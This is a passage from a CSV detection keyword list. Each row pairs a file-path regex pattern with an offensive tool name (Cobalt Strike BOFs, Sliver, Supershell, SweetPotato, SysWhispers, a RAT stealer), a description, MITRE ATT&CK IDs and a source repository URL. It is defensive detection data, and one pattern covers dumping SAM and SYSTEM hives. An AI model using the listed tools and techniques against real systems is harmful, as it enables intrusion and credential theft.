T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/striker.py",".{0,1000}\/striker\.py","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/string_of_paerls.profile*",".{0,1000}\/string_of_paerls\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/stun-info.nse*",".{0,1000}\/stun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stun-version.nse*",".{0,1000}\/stun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stuxnet-detect.nse*",".{0,1000}\/stuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/subdomain.yaml*",".{0,1000}\/subdomain\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/subdomains.txt*",".{0,1000}\/subdomains\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/subdomains-10000.txt*",".{0,1000}\/subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/submit_to_nemesis.py*",".{0,1000}\/submit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/submit_to_nemesis.sh*",".{0,1000}\/submit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/submit_to_nemesis.yaml*",".{0,1000}\/submit_to_nemesis\.yaml.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Suborner.git*",".{0,1000}\/Suborner\.git.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*/sudo_tracer.c*",".{0,1000}\/sudo_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/sudomy.api*",".{0,1000}\/sudomy\.api.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*/sullo/nikto*",".{0,1000}\/sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*/sunlogin_rce*",".{0,1000}\/sunlogin_rce.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","474","199","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*/Sup3r-Us3r/scripts/*",".{0,1000}\/Sup3r\-Us3r\/scripts\/.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/supermicro-ipmi-conf.nse*",".{0,1000}\/supermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Supernova.exe*",".{0,1000}\/Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*/Supernova.git*",".{0,1000}\/Supernova\.git.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*/SuperProfileDLL*",".{0,1000}\/SuperProfileDLL.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Supershell.tar.gz*",".{0,1000}\/Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/supershell/login/auth*",".{0,1000}\/supershell\/login\/auth.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/Supershell/releases*",".{0,1000}\/Supershell\/releases.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/suspendresume.x64*",".{0,1000}\/suspendresume\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/suspendresume.x86*",".{0,1000}\/suspendresume\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/svn-brute.nse*",".{0,1000}\/svn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SweetPotato.exe*",".{0,1000}\/SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Sweetpotato.exe*",".{0,1000}\/Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*/SweetPotato.git*",".{0,1000}\/SweetPotato\.git.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*/SweetPotato_CS*",".{0,1000}\/SweetPotato_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","238","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*/SweetPotato-master.zip*",".{0,1000}\/SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*/Synergy-httpx.git*",".{0,1000}\/Synergy\-httpx\.git.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*/syscalls/syscalls_windows.go*",".{0,1000}\/syscalls\/syscalls_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/syscalls/syswhispers/*",".{0,1000}\/syscalls\/syswhispers\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/syscalls/syswhispersv2*",".{0,1000}\/syscalls\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/SyscallsInject/*",".{0,1000}\/SyscallsInject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/sysconfig/iodine-server*",".{0,1000}\/sysconfig\/iodine\-server.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/SysmonQuiet*",".{0,1000}\/SysmonQuiet.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*/system:SystemBkup.hiv /sam:SamBkup.hiv*",".{0,1000}\/system\:SystemBkup\.hiv\s\/sam\:SamBkup\.hiv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/SysWhispers2*",".{0,1000}\/SysWhispers2.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*/SysWhispers3*",".{0,1000}\/SysWhispers3.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*/SysWhispers3.git*",".{0,1000}\/SysWhispers3\.git.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "*/syswhispersv2*",".{0,1000}\/syswhispersv2.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/t.me/NicestRAT*",".{0,1000}\/t\.me\/NicestRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*/t2w.py*",".{0,1000}\/t2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/t3l3machus/Villain*",".{0,1000}\/t3l3machus\/Villain.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*/taidoor.profile*",".{0,1000}\/taidoor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/TakeMyRDP*",".{0,1000}\/TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*/TakeMyRDP2.0*",".{0,1000}\/TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/Talon.py*",".{0,1000}\/Talon\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" 